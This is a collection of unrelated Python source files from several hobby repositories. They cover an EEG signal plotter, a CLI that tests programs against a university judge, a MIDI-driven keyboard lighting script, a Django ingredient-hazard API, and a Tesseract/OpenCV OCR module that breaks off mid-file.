#### File: EEGPlotter/app/plotter.py
```python
from .processing import filters, average
from PyQt5 import QtCore, QtGui, QtWidgets
from pyqtgraph import mkPen
import numpy as np
class Plotter(object):
def __init__(self, ui, stream, f):
super().__init__()
self.ui = ui
self.stream = stream
self.pltFilter = self.ui.plotWidget.addPlot(row=0, col=0)
self.pltFFT = self.ui.plotWidget.addPlot(row=1, col=0)
self.curveFilter = self.pltFilter.plot()
self.curveAverage = self.pltFilter.plot()
self.curveFFT = self.pltFFT.plot()
if self.stream is not None:
self.avrg = average.Averager(self.stream.buf_max_size, 5)
self._penAvrg = mkPen('r') # red pen
self.doFilter = False
self.ui.cutoffLowSpinBox.setEnabled(False)
self.ui.cutoffHighSpinBox.setEnabled(False)
self.lowCutoff = f/2 - 0.01
self.highCutoff = 0.000001
self.samplingFreq = f
self._connectSlots()
self._start()
def _start(self):
if self.stream is not None:
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self._update)
self.stream.open()
self.timer.start(0)
print('>> Plotting...\n')
def _update(self):
filtered = filters.butterworth(self.stream.buf,
self.samplingFreq,
(self.lowCutoff, self.highCutoff),
2,
fopt='bandpass')
x, y = filters.fftUtil(np.arange(self.stream.buf_max_size),
filtered,
1/self.samplingFreq)
self.curveFilter.setData(filtered)
self.curveAverage.setData(self.avrg.calc(filtered), pen=self._penAvrg)
        y[0] = 0  # remove the 0 Hz bin
self.curveFFT.setData(x, y)
def _onCheckBoxStateChanged(self, state):
if state == QtCore.Qt.Checked:
self.doFilter = True
self.ui.cutoffLowSpinBox.setValue(self.lowCutoff)
self.ui.cutoffLowSpinBox.setEnabled(True)
self.ui.cutoffHighSpinBox.setValue(self.highCutoff)
self.ui.cutoffHighSpinBox.setEnabled(True)
else:
self.doFilter = False
self.ui.cutoffLowSpinBox.setEnabled(False)
self.ui.cutoffHighSpinBox.setEnabled(False)
def _onLowSpinBoxValueChanged(self, d):
self.lowCutoff = d
def _onHighSpinBoxValueChanged(self, d):
self.highCutoff = d
def _connectSlots(self):
self.ui.filterCheckBox.\
stateChanged.connect(self._onCheckBoxStateChanged)
self.ui.cutoffLowSpinBox.\
valueChanged.connect(self._onLowSpinBoxValueChanged)
self.ui.cutoffHighSpinBox.\
valueChanged.connect(self._onHighSpinBoxValueChanged)
```
#### File: app/processing/average.py
```python
from collections import deque
import numpy as np
class Averager(object):
    def __init__(self, sz, numSamples):
        self.numSamples = numSamples if numSamples >= 2 else 2
        # Give every slot its own array: sharing a single zeros buffer between
        # the running sum and the deque entries would corrupt them all on the
        # in-place updates performed in calc().
        self.__sigs = deque((np.zeros(sz, dtype='float64') for _ in range(self.numSamples)),
                            self.numSamples)
        self.__sum = np.zeros(sz, dtype='float64')
    def calc(self, newsig):
        if not self._isndarray(newsig):
            newsig = np.array(newsig, dtype='float64')
        # Subtract the sample that is about to be evicted *before* appending:
        # appending to a full deque drops its leftmost element.
        self.__sum += newsig - self.__sigs[0]
        self.__sigs.append(newsig)
        av = self.__sum / self.numSamples
        return av
def _isndarray(self, arr):
return isinstance(arr, np.ndarray)
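# A minimal usage sketch (hypothetical values): a 3-sample moving average over
# length-4 signals.
#
#   avg = Averager(sz=4, numSamples=3)
#   for sig in ([1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]):
#       out = avg.calc(sig)  # last call returns array([2., 2., 2., 2.])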
```
#### File: app/uigen/mainWindowUI.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(740, 626)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setObjectName("groupBox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout.setObjectName("verticalLayout")
self.plotGroupWidget = QtWidgets.QWidget(self.groupBox)
self.plotGroupWidget.setObjectName("plotGroupWidget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.plotGroupWidget)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.filterHLayout = QtWidgets.QHBoxLayout()
self.filterHLayout.setObjectName("filterHLayout")
self.cutoffLowLabel = QtWidgets.QLabel(self.plotGroupWidget)
self.cutoffLowLabel.setObjectName("cutoffLowLabel")
self.filterHLayout.addWidget(self.cutoffLowLabel)
self.cutoffLowSpinBox = QtWidgets.QDoubleSpinBox(self.plotGroupWidget)
self.cutoffLowSpinBox.setMaximum(99999.99)
self.cutoffLowSpinBox.setObjectName("cutoffLowSpinBox")
self.filterHLayout.addWidget(self.cutoffLowSpinBox)
self.cutoffHighLabel = QtWidgets.QLabel(self.plotGroupWidget)
self.cutoffHighLabel.setObjectName("cutoffHighLabel")
self.filterHLayout.addWidget(self.cutoffHighLabel)
self.cutoffHighSpinBox = QtWidgets.QDoubleSpinBox(self.plotGroupWidget)
self.cutoffHighSpinBox.setEnabled(True)
self.cutoffHighSpinBox.setMaximum(99999.99)
self.cutoffHighSpinBox.setObjectName("cutoffHighSpinBox")
self.filterHLayout.addWidget(self.cutoffHighSpinBox)
self.filterCheckBox = QtWidgets.QCheckBox(self.plotGroupWidget)
self.filterCheckBox.setObjectName("filterCheckBox")
self.filterHLayout.addWidget(self.filterCheckBox)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.filterHLayout.addItem(spacerItem)
self.verticalLayout_2.addLayout(self.filterHLayout)
self.plotWidget = GraphicsLayoutWidget(self.plotGroupWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.plotWidget.sizePolicy().hasHeightForWidth())
self.plotWidget.setSizePolicy(sizePolicy)
self.plotWidget.setMinimumSize(QtCore.QSize(200, 200))
self.plotWidget.setObjectName("plotWidget")
self.verticalLayout_2.addWidget(self.plotWidget)
self.verticalLayout.addWidget(self.plotGroupWidget)
self.gridLayout.addWidget(self.groupBox, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.groupBox.setTitle(_translate("MainWindow", "PLOT"))
self.cutoffLowLabel.setText(_translate("MainWindow", "Low Cut-Off"))
self.cutoffHighLabel.setText(_translate("MainWindow", "High Cut-Off"))
self.filterCheckBox.setText(_translate("MainWindow", "FILTER"))
from pyqtgraph import GraphicsLayoutWidget
``` |
{
"source": "a1varo-costa/susytest",
"score": 3
} |
#### File: a1varo-costa/susytest/susytest.py
```python
from urllib.request import urlopen
import subprocess
import difflib
import pprint
import click
import ssl
import sys
import re
class SusyURLValidator(click.ParamType):
"""Validate URL given as command line argument"""
regex = r'(https\:\/\/susy\.ic\.unicamp\.br\:9999\/)(\w+)\/(\w+)$'
example = 'https://susy.ic.unicamp.br:9999/<COURSE>/<EXERCISE>'
name = 'url'
def convert(self, value, param, ctx):
match = re.match(self.regex, value)
if not match:
self.fail(
f'"{value}".\n > Expected pattern: "{self.example}"',
param,
ctx
)
value = {
'url': match.group(0),
'netloc': match.group(1),
'course': match.group(2),
'exercise': match.group(3)
}
return value
class TestsNotFoundError(Exception):
"""No test cases files found on web page"""
pass
def match_files(html):
"""Extract test file names from HTML source"""
try:
end = re.search(r'Testes fechados', html).end()
        matches = re.findall(r'"(arq\d\.\w+)"', html[ : end])
except AttributeError:
raise TestsNotFoundError
if len(matches) < 2:
raise TestsNotFoundError
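    # Matches arrive in (input, solution) order, e.g. ["arq1.in", "arq1.sol", ...],
    # so pair consecutive entries into test cases.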
files = [tuple(matches[i:i+2]) for i in range(0, len(matches), 2)]
return files
def download_tests(url):
"""Download test cases files (input/solution)"""
def _download(url):
with urlopen(url, context=ssl.SSLContext(ssl.PROTOCOL_TLS)) as response:
return response.read().decode()
html = _download(url + '/dados/testes.html')
files = match_files(html)
tests = []
for i, val in enumerate(files):
_in, _sol = val
t = {
'id': i,
'in': _download(url + '/dados/' + _in).splitlines(keepends=True),
'sol': _download(url + '/dados/' + _sol).splitlines(keepends=True)
}
tests.append(t)
return tests
def run(cmd, _in):
"""Run `cmd` passing `_in` to stdin"""
proc = subprocess.run(
args = cmd,
input = ''.join(_in),
encoding = 'utf-8',
capture_output = True,
check = True,
timeout = 1.5 # seconds
)
return proc
def pretty_diff_ans(a, b):
"""Compare `a` and `b` returning a list of ANSI styled string
and a boolean indicating if `a` and `b` are equal"""
d = difflib.ndiff(a, b)
ret = []
equal = True
    for s in d:
        # Any '- ', '+ ' or '? ' line means the outputs differ; checking only
        # '? ' misses whole-line insertions/deletions, which emit no guide line.
        if s.startswith('- '):
            equal = False
            ret.append(click.style(s, fg='red'))
        elif s.startswith('+ '):
            equal = False
            ret.append(click.style(s, fg='green'))
        elif s.startswith('? '):
            equal = False
            ret.append(click.style(s, fg='cyan'))
        else:
            ret.append(click.style(s, fg='green'))
return ret, equal
@click.command()
@click.option('-n', '--nodiff', is_flag=True, help='Disable output diff.')
@click.option('-v', '--verbose', is_flag=True, help='Enable verbose output.')
@click.version_option()
@click.argument('url', type=SusyURLValidator())
@click.argument('prog', type=click.Path(exists=True, dir_okay=False))
def cli(url, prog, nodiff, verbose):
"""A script to automate the testing of programs to be
submitted to Unicamp's SuSy platform."""
pp = pprint.PrettyPrinter(indent=4, width=79)
if verbose:
click.echo(f"URL:\t\t\"{url['url']}\"")
click.echo(f"Prog:\t\t\"{prog}\"")
try:
tests = download_tests(url['url'])
click.echo(f'Test Cases:\t{len(tests)}\n')
except TestsNotFoundError:
click.echo(f"> No test files found at \"{url['url']}\".")
sys.exit(1)
for test in tests:
try:
click.echo(click.style(f">> TEST {test['id']}", fg='yellow'))
result = run(prog, test['in'])
if verbose:
click.echo(
click.style('> Input:', bold=True) +
'\n' +
pp.pformat(test['in'])
)
click.echo(
'\n' +
click.style('> Output:', bold=True) +
'\n' +
pp.pformat(result.stdout.splitlines(keepends=True)) +
'\n'
)
diff, equal = pretty_diff_ans(
result.stdout.splitlines(keepends=True),
test['sol']
)
if nodiff:
msg = 'OK' if equal else 'Wrong Answer'
fg = 'green' if equal else 'red'
click.secho('> ' + msg, fg=fg)
continue
click.echo(
click.style('> Diff:', bold=True) +
'\n' +
''.join(diff)
)
except subprocess.TimeoutExpired as e:
click.echo(f'> Timeout of {e.timeout}s expired while waiting for program "{e.cmd}".')
except subprocess.CalledProcessError as e:
click.echo(f'> Program "{e.cmd}" returned non-zero exit status {e.returncode}.')
except Exception as e:
click.echo('> Unexpected error:\n')
click.echo(e)
sys.exit(1)
``` |
{
"source": "a1vv/KompleteKontrolLightGuide",
"score": 3
} |
#### File: a1vv/KompleteKontrolLightGuide/SynthesiaKontrol-MK1.py
```python
import hid
import mido
from msvcrt import getch
numkeys = 88 #change this to the number of keys on your keyboard
offset = -(108-numkeys+1)
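# MIDI note 108 (C8) is the top key; for an 88-key board the lowest key is
# A0 (MIDI note 21), so "note + offset" maps MIDI note numbers to 0-based
# key indices.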
pid = 0x1410 #change this to the product id of your keyboard
def init():
"""Connect to the keyboard, switch all lights off"""
global bufferC # Buffer with the full key/lights mapping
global device
device=hid.device()
# 0x17cc: Native Instruments. 0x1410: KK S88 MK1
device.open(0x17cc, pid)
device.write([0xa0])
bufferC = [0x00] * numkeys
notes_off()
return True
def notes_off():
"""Turn off lights for all notes"""
bufferC = [0x00] * numkeys
device.write([0x82] + bufferC)
def accept_notes(port):
"""Only let note_on and note_off messages through."""
for message in port:
if message.type in ('note_on', 'note_off'):
yield message
if message.type == 'control_change' and message.channel == 0 and message.control == 16:
if (message.value & 4):
print ("User is playing")
if (message.value & 1):
print ("Playing Right Hand")
if (message.value & 2):
print ("Playing Left Hand")
notes_off()
def LightNote(note, status, channel, velocity):
"""Light a note ON or OFF"""
key = (note + offset)
if key < 0 or key >= numkeys:
return
# Determine color
left = [0x00] + [0x00] + [0xFF] # Blue
left_thumb = [0x00] + [0x00] + [0x80] # Lighter Blue
right = [0x00] + [0xFF] + [0x00] # Green
right_thumb = [0x00] + [0x80] + [0x00] # Lighter Green
default = right
color = default
# Finger based channel protocol from Synthesia
# Reference: https://www.synthesiagame.com/forum/viewtopic.php?p=43585#p43585
if channel == 0:
# we don't know who or what this note belongs to, but light something up anyway
color = default
if channel >= 1 and channel <= 5:
# left hand fingers, thumb through pinky
if channel == 1:
color = left_thumb
else:
color = left
if channel >= 6 and channel <= 10:
# right hand fingers, thumb through pinky
if channel == 6:
color = right_thumb
else:
color = right
if channel == 11:
# left hand, unknown finger
color = left
if channel == 12:
# right hand, unknown finger
color = right
black = [0x00] * 3
if status == 'note_on' :
colors[3*key:3*key+3]=color #set the three colorvalues of the key to desired color
if status == 'note_off' :
colors[3*key:3*key+3]=black #set the key back to black
device.write([0x82] + colors) #changes the color of pressed key
if __name__ == '__main__':
"""Main: connect to keyboard, open midi input port, listen to midi"""
print ("Connecting to Komplete Kontrol Keyboard")
connected = init()
if connected:
print ("Opening LoopBe input port")
        ports = mido.get_input_names()
        portName = None
        for port in ports:
            if "LoopBe" in port:
                portName = port
        if portName is None:
            raise SystemExit("No LoopBe MIDI input port found")
print ("Listening to Midi")
with mido.open_input(portName) as midiPort:
black = [0x00] * 3 #color, R + G + B (in this case black)
colors = black * numkeys #sets the color to all 88 keys (when it gets written to kontrol)
for message in accept_notes(midiPort):
print('Received {}'.format(message))
LightNote(message.note, message.type, message.channel, message.velocity)
``` |
{
"source": "a1xbu/DevergenceWallet",
"score": 2
} |
#### File: DevergenceWallet/faucet/setcode.py
```python
import sys
from Faucet import Faucet
from User import User
from tonclient.client import DEVNET_BASE_URLS, MAINNET_BASE_URLS
def main():
    if len(sys.argv) <= 1:
        print("Usage:\nsetcode.py keyfile.json [endpoint1] [endpoint2] [...]")
        return
    endpoints = sys.argv[2:] if len(sys.argv) > 2 else DEVNET_BASE_URLS
keyfile = sys.argv[1]
faucet = Faucet(keyfile, endpoints)
user = User(keyfile, endpoints)
user_code = user.get_code_from_tvc()
print(user_code)
result = faucet.setUserCode(user_code)
print(result)
print(faucet.get_address())
if __name__ == '__main__':
main()
``` |
{
"source": "a1xg/OpenTox",
"score": 2
} |
#### File: apps/backend/mixins.py
```python
from .services.hazard_assessor import HazardMeter
from .services.ocr import ImageOCR
from .serializers import IngredientsSerializer, ProductSerializer, DetailsIngredientSerializer
from .services.text_blocks_screening import IngredientsBlockFinder
from .services.db_tools import DBQueries
from .services.ocr_settings import *
class SearchMixin:
def __init__(self):
self.box_index = None # Target block with text
self.queryset = None
self.output_image = None
def _get_queryset(self, **kwargs):
if 'request_text' in kwargs:
finder = IngredientsBlockFinder(data=kwargs['request_text'])
self.queryset = finder.get_data()
            if finder.box_index is not None:
                self.box_index = finder.box_index
elif 'pk' in kwargs:
self.queryset = DBQueries().search_in_db(pk=kwargs['pk'])
def get_context(self, **kwargs):
if 'image' in kwargs:
ocr = ImageOCR(img=kwargs['image'])
kwargs['request_text'] = ocr.get_text(
text_lang=DEFAULT_LANG,
crop=kwargs['crop'],
)
elif 'text' in kwargs:
kwargs['request_text'] = [{
'lang':DEFAULT_LANG,
'text':kwargs['text']
}]
self._get_queryset(**kwargs)
ingredients_data = IngredientsSerializer(self.queryset, many=True).data
output_data = HazardMeter(data=ingredients_data, display_format=kwargs['display_format']).get_data()
output_data['image_with_ingredients'] = None
        if self.box_index is not None and 'image' in kwargs:
output_data['image_with_ingredients'] = ocr.draw_boxes(
index=self.box_index,
max_resolution=700,
color= (0,255,0),
base64=True
)
if kwargs['display_format'] == 'list':
return ProductSerializer(output_data, many=False).data
elif kwargs['display_format'] == 'detail':
return {
'ingredient': DetailsIngredientSerializer(output_data, many=False).data
}
```
#### File: apps/backend/serializers.py
```python
from rest_framework import serializers
from .models import *
# REST API request serializers
class TextSearchSerializer (serializers.Serializer):
text = serializers.CharField()
def validate_text(self, attrs):
if len(attrs) <= 0:
raise serializers.ValidationError('Please enter components')
return attrs
class ImageSearchSerializer (serializers.Serializer):
image = serializers.ImageField()
crop = serializers.BooleanField()
def validate_image(self, attrs):
if len(attrs) <= 0:
raise serializers.ValidationError('Please select an image to download')
return attrs
class Hazard_GHSSerializer (serializers.ModelSerializer):
"""
Serializer combining data from Hazard_GHS and GHS tables
"""
id = serializers.IntegerField(source='ghs.id', read_only=True)
hazard_class = serializers.CharField(source='ghs.hazard_class', read_only=True)
abbreviation = serializers.CharField(source='ghs.abbreviation', read_only=True)
hazard_category = serializers.CharField(source='ghs.hazard_category', read_only=True)
ghs_code = serializers.CharField(source='ghs.code', read_only=True)
description = serializers.CharField(source='ghs.description', read_only=True)
hazard_scale_score = serializers.IntegerField(source='ghs.hazard_scale_score', read_only=True)
class Meta:
model = Hazard_GHS
fields = (
'id',
'hazard_class',
'abbreviation',
'hazard_category',
'ghs_code',
'description',
'confirmed_status',
'hazard_scale_score',
'number_of_notifiers',
)
# Model serializers for internal application logic
class HazardSerializer(serializers.ModelSerializer):
hazard_ghs_set = Hazard_GHSSerializer(many=True, read_only=True)
class Meta:
model = Hazard
fields = (
'total_notifications',
'sourse',
'hazard_ghs_set',
'cl_inventory_id'
)
class IngredientsSerializer(serializers.ModelSerializer):
hazard = HazardSerializer(many=False, read_only=True)
class Meta:
model = Ingredients
fields = (
'id',
'main_name',
'hazard',
'e_number',
'functions',
'pubchem_cid',
'cas_numbers',
'ec_numbers',
'colour_index',
'description',
'request_statistics',
'synonyms'
)
# Ingredient detail serializers
class GHSDetailsSerializer(serializers.Serializer):
"""
Ingredient hazard data serializer detail page
"""
# id = serializers.IntegerField()
hazard_class = serializers.CharField()
abbreviation = serializers.CharField()
hazard_category = serializers.CharField()
ghs_code = serializers.CharField()
description = serializers.CharField()
hazard_scale_score = serializers.IntegerField()
number_of_notifiers = serializers.IntegerField()
percent_notifications = serializers.IntegerField()
class DetailsIngredientHazardSerializer (serializers.Serializer):
"""
Ingredient hazard detail serializer
"""
hazard_ghs_set = GHSDetailsSerializer(many=True)
ingredient_hazard_avg = serializers.IntegerField()
total_notifications = serializers.IntegerField()
sourse = serializers.CharField()
cl_inventory_id = serializers.IntegerField()
class DetailsIngredientSerializer (serializers.Serializer):
"""
Serializer of data and ingredient identifiers
"""
id = serializers.IntegerField()
hazard = DetailsIngredientHazardSerializer(many=False)
main_name = serializers.CharField()
e_number = serializers.CharField()
functions = serializers.ListField()
pubchem_cid = serializers.IntegerField()
cas_numbers = serializers.ListField()
ec_numbers = serializers.ListField()
colour_index = serializers.ListField()
description = serializers.CharField()
request_statistics = serializers.IntegerField()
synonyms = serializers.DictField()
# Serializers for search results
class GHSListSerializer (serializers.Serializer):
"""
Hazard data serializer of an ingredient in an ingredient list
"""
id = serializers.IntegerField()
hazard_class = serializers.CharField()
# abbreviation = serializers.CharField()
# hazard_category = serializers.CharField()
ghs_code = serializers.CharField()
description = serializers.CharField()
# hazard_scale_score = serializers.IntegerField()
# number_of_notifiers = serializers.IntegerField()
# percent_notifications = serializers.IntegerField()
class ListIngredientHazardSerializer (serializers.Serializer):
"""
Ingredient hazard data serializer on search results page
"""
ingredient_hazard_avg = serializers.FloatField()
hazard_ghs_set = GHSListSerializer(many=True)
class ListIngredientSerializer (serializers.Serializer):
"""
Serializer of the list of ingredients in a product
"""
id = serializers.IntegerField()
hazard = ListIngredientHazardSerializer(many=False)
main_name = serializers.CharField()
# e_number = serializers.CharField()
# functions = serializers.ListField()
# pubchem_cid = serializers.IntegerField()
# cas_numbers = serializers.ListField()
# ec_numbers = serializers.ListField()
# colour_index = serializers.ListField()
# description = serializers.CharField()
# request_statistics = serializers.IntegerField()
class ProductHazardStatisticsSerializer (serializers.Serializer):
"""
Whole product hazard data serializer
"""
id = serializers.IntegerField()
hazard_class = serializers.CharField()
# abbreviation = serializers.CharField()
# hazard_category = serializers.CharField()
description = serializers.CharField()
hazard_scale_score = serializers.IntegerField()
num_of_ingredients = serializers.IntegerField()
class ProductSerializer (serializers.Serializer):
"""
Product data serializer
"""
product_ingredients = ListIngredientSerializer(many=True)
detail_hazard_product = ProductHazardStatisticsSerializer(many=True)
product_hazard_avg = serializers.IntegerField()
image_with_ingredients = serializers.DictField()
```
#### File: apps/backend/views.py
```python
from rest_framework import generics
from rest_framework import response
from .serializers import *
from .mixins import SearchMixin
# DRF API VIEWS
class TextSearchAPIView(SearchMixin, generics.ListAPIView):
serializer_class = TextSearchSerializer
def post(self, request):
serializer = TextSearchSerializer(data=request.data, many=False)
if serializer.is_valid(raise_exception=True):
context = self.get_context(text=serializer.validated_data['text'], display_format='list')
return response.Response(context, status=200)
return response.Response(serializer.errors, status=400)
class ImageSearchAPIView(SearchMixin, generics.ListAPIView):
serializer_class = ImageSearchSerializer
def post(self, request):
serializer = ImageSearchSerializer(data=request.data, many=False)
if serializer.is_valid(raise_exception=True):
context = self.get_context(
image=serializer.validated_data["image"].read(),
display_format='list',
crop=serializer.validated_data["crop"]
)
return response.Response(context, status=200)
return response.Response(serializer.errors, status=400)
class DetailAPIView(SearchMixin, generics.RetrieveAPIView):
def get(self, request, pk):
context = self.get_context(display_format='detail', pk=pk)
return response.Response(context, status=200)
``` |
{
"source": "a1xg/Tesseract-opencv-OCR-for-product-labels",
"score": 3
} |
#### File: a1xg/Tesseract-opencv-OCR-for-product-labels/ocr.py
```python
import re
import base64
import numpy as np
import cv2
import pytesseract
import pycountry
from langdetect import detect, DetectorFactory
from ocr_settings import *
# Absolute path to tesseract.exe file if environment variable is not working correctly
pytesseract.pytesseract.tesseract_cmd = TESSERACT_PATH
# The module is able to select a text scene in images containing foreign objects
# and cut out text paragraphs separately. Unfortunately, the image skew compensation
# has not yet been implemented.
#
# The module is able to automatically recognize the language, for which it makes a
# test recognition of text from the cut sample of the image (the crop factor can be adjusted),
# the language is recognized and re-recognition is done with an explicit indication of the language.
# If the image contains several text paragraphs in different languages and the
# language was not specified, the module will automatically recognize the language of each paragraph.
#
# This module implements the calculation of the average number of lines, the average font size
# and the ratio of the size of the image to the text block in the image. This is required to
# automatically adjust the filters applied to the image in order to improve the quality of
# recognition of images with different font sizes, with a different number of lines and
# different text segmentation.
# TODO
# Find ways to process multiple images simultaneously.
# Check that the recognized language is in the list of languages available to Tesseract, otherwise return False.
# Handle the langdetect exception raised for images that contain no text.
# Transfer the ocr module to the client side and rewrite it to JavaScript accordingly.
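#
# A minimal usage sketch (assumes a local "label.jpg" test photo and a
# Tesseract install with the detected language packs available):
#
#   img = cv2.imread("label.jpg")
#   ocr = ImageOCR(img)
#   blocks = ocr.get_text(text_lang=False, crop=True)  # auto-detect language
#   for block in blocks:
#       print(block['lang'], block['text'][:80])
#   preview = ocr.draw_boxes(max_resolution=700, color=(0, 255, 0))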
class ImageOCR:
def __init__(self, img):
self.original = img
# if image dtype == numpy.ndarray
self.img = img
#if image dtype is binary
#self.img = self._decode_image(img)
self.result = [] # output list of dictionaries with recognized text in the format {'lang':'text'}
self._boxes = []
def _decode_image(self, input_img) -> np.ndarray:
'''Decode bytes image to numpy format'''
        # np.frombuffer replaces the deprecated np.fromstring
        decoded_img = cv2.imdecode(np.frombuffer(input_img, np.uint8), cv2.IMREAD_UNCHANGED)
return decoded_img
def _encode_image(self, input_img:np.ndarray):
'''Encodes an np.ndarray into a base64 string'''
        retval, buffer = cv2.imencode('.jpg', input_img)
        # Convert to base64 so the image can be embedded in a text response
        base64_string = base64.b64encode(buffer)
        output_image = {
            'height': input_img.shape[0],
            'width': input_img.shape[1],
            'image': base64_string,
}
return output_image
def _image_preprocessing(self) -> np.ndarray:
        '''Contrast-limited adaptive histogram equalization (CLAHE) of the grayscale image'''
grayscale = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize= (8,8))
normalised_img = clahe.apply(grayscale)
self.img = normalised_img
def _resize_image(self, image:np.ndarray, max_resolution:int) -> np.ndarray:
""" The method resizes the image to the maximum allowed
maintaining the original proportions regardless of vertical or
horizontal orientation, for example: from image 2000x1600px or 1600x2000px, if the maximum dimension
set as 1000 pixels, then 1000x800 or 800x1000 can be obtained.
"""
max_dim = max(image.shape[0:2])
scale_coef = max_dim / max_resolution
new_dim = (int(image.shape[1] / scale_coef), int(image.shape[0] / scale_coef))
img_scaled = cv2.resize(image, new_dim, interpolation=cv2.INTER_CUBIC)
return img_scaled
def _measure_strings(self) -> tuple:
        '''Count the text lines in the image and measure the average font height.

        :return: (mean_font_size, mean_num_lines)
        '''
num_lines = []
font_size = []
height, width = self.img.shape[0:2]
for slice in MEASURE_STRINGS_SLICES:
newX = width*slice[0]
newW = width*slice[1] - width*slice[0]
crop = self.img[0:height, int(newX):int(newX+newW)]
crop = self._get_text_mask(crop, font_size=0, num_lines=0)
# Reduce the 2D array along the X axis to a 1D array
hist = cv2.reduce(crop, 1, cv2.REDUCE_AVG).reshape(-1)
H, W = crop.shape[:2]
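            # A text line starts where the row-averaged brightness crosses
            # MEASURE_TH from below (a rising edge in the vertical profile).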
lines = [y for y in range(H - 2) if hist[y] <= MEASURE_TH and hist[y + 1] > MEASURE_TH]
if len(lines) > 0:
font_size.extend([lines[i+1] - lines[i] for i in range(len(lines) - 1)])
num_lines.append(len(lines))
# Calculate the average line height in pixels
mean_font_size = int(np.array(font_size).mean()) if len(font_size) > 1 else 0
# Calculate the average number of text lines
mean_num_lines = int(np.array(num_lines).mean()) if len(num_lines) > 1 else 0
return (mean_font_size, mean_num_lines)
def _get_text_mask(self, image:np.ndarray, font_size:int, num_lines:int) -> np.ndarray:
"""
The method searches the image for a text block and creates
mask to use it to find outlines bounding the text and crop the excess part of the image.
"""
rect_kernel_size = (100, 5) # (W, H) default values 100, 5
sq_kernel_size = (100, 5) # (W, H) default values 100, 5
        if font_size:
            # calculate the coefficient of sparseness of the text in the image
            # for optimal filter settings
            h_text_coef = font_size*num_lines/image.shape[0]
            rect_kernel_size = (int(font_size*0.6), int(font_size*0.4/h_text_coef))
            sq_kernel_size = (int(font_size*0.5), int(font_size*0.4/h_text_coef))
# Apply filters to the image
imgBlur = cv2.GaussianBlur(image, (3, 3), 0) # 3Х3
kernel1 = cv2.getStructuringElement(cv2.MORPH_RECT, rect_kernel_size)
kernel2 = cv2.getStructuringElement(cv2.MORPH_RECT, sq_kernel_size)
blackHat = cv2.morphologyEx(imgBlur, cv2.MORPH_BLACKHAT, kernel1)
gradX = cv2.Sobel(blackHat, ddepth=cv2.CV_32F, dx=1, dy=0, ksize=-1)
gradX = np.absolute(gradX)
(minVal, maxVal) = (np.min(gradX), np.max(gradX))
gradX = (255 * ((gradX - minVal) / (maxVal - minVal))).astype("uint8")
gradX = cv2.morphologyEx(gradX, cv2.MORPH_CLOSE, kernel1)
threshold1 = cv2.threshold(gradX, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]
threshold2 = cv2.morphologyEx(threshold1, cv2.MORPH_CLOSE, kernel2)
text_mask = cv2.erode(threshold2, None, iterations=4)
# remove the edge of the image, so that in the future there
# would be no outlines recognition outside the image
border = int(image.shape[1] * 0.05)
text_mask[:, 0: border] = 0
text_mask[:, image.shape[1] - border:] = 0
return text_mask
def _get_binary_images(self, image:np.ndarray, font_size) -> list:
'''The method crops the text area of interest in the image, brings the
resolution of the cropped area to the new standard maximum resolution.
'''
binary_images = []
# If the list of bounding boxes is empty, then the entire image will be the bounding box
self._boxes = [[0, 0, image.shape[1], image.shape[0]]] if len(self._boxes) <= 0 else self._boxes
# Cut out blocks with text from the original image using bounding boxes
for index, box in enumerate(self._boxes):
(x, y, w, h) = box
cropped_img = image[y:y + h, x:x + w]
num_lines = int(cropped_img.shape[0]/font_size) # count the number of lines in the image
# If the number of lines is more than the threshold value, then we process the image, otherwise we skip
if num_lines > LINE_NUM_THRESHOLD:
# blur the image
blur_size = int(np.ceil(font_size*0.2))
blur_size = blur_size if blur_size % 2 != 0 else blur_size + 1
gaussian_blured = cv2.GaussianBlur(cropped_img, (blur_size, blur_size), 10)
# sharpen the image
test_sharpened = cv2.addWeighted(cropped_img, 1.5, gaussian_blured, -0.9, 0)
# blur the image in order to minimize noise in the image in the next step
median_size = int(np.ceil(font_size*0.02))
median_size = median_size if median_size % 2 != 0 else median_size + 1
medianblur = cv2.medianBlur(test_sharpened, median_size) # default 3
# image binarization
test_thresh = cv2.threshold(medianblur, 0, 255, cv2.THRESH_BINARY|cv2.THRESH_OTSU)[1]
# We calculate the percentage of black pixels relative to the total number of pixels
percent_zeros = int(cv2.countNonZero(test_thresh)*100/(test_thresh.shape[1]*test_thresh.shape[0]))
# If the background of the picture is more than n% black, and the text is white, then invert the colors
img_binary = cv2.bitwise_not(test_thresh) if percent_zeros < 40 else test_thresh
# We calculate the ratio of the height of the image to the font and the number of lines
scale_coef = font_size/TARGET_FONT_SIZE
max_dimension = max(img_binary.shape[0:2])
new_max_resolution = max_dimension/scale_coef
# Resize excessively large images based on the desired font size
scaled_binary_img = self._resize_image(img_binary, new_max_resolution)
binary_images.append((index,scaled_binary_img))
# return an array of binary images, if any.
return binary_images if len(binary_images) > 0 else False
def _find_boxes(self, mask_img:np.ndarray) -> None:
"""
        The method accepts a binary image mask that selects text blocks, finds
        their bounding boxes, drops very small boxes, and keeps at most
        NUM_OF_LARGEST_BOXES boxes with the largest area.
"""
